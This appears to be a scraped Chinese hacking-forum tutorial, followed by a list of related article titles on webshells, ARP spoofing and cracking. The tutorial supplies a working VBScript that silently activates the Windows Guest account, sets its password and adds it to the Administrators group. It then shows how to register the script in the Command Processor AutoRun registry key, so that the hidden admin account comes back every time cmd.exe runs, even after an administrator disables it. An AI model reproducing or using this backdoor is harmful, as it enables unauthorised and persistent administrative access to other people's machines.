dim wsh
set wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0 (激活guest账号)
wsh.run "net user guest djhacker",0 (修改guest密码为djhacker)
wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的:
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件
| Vista+谷歌拼音输入法重现输入法 | 04-06 | |
| 45种可以拿到Webshell的技巧 | 04-02 | |
| 0起步接触黑客--实用价值相当高 | 04-02 | |
| 普通文件的欺骗手法 | 03-21 | |
| 黑客技术-ARP欺骗 | 03-19 | |
| 跨站Script攻击和防范 | 03-19 | |
| 超级兔子+WinRAR轻松破解收费加密 | 03-16 | |
| 浏览器执行exe文件的探讨 | 03-15 | |
| 菜鸟"搜"大量Web Shell的思路 | 03-14 | |
| 轻松录制在线网络电视的方法 | 03-14 | |
| 突破单位网管封杀QQ、MSN 端口的 | 03-14 | |
| 菜鸟找漏洞—渗透网站的“反思” | 02-06 | |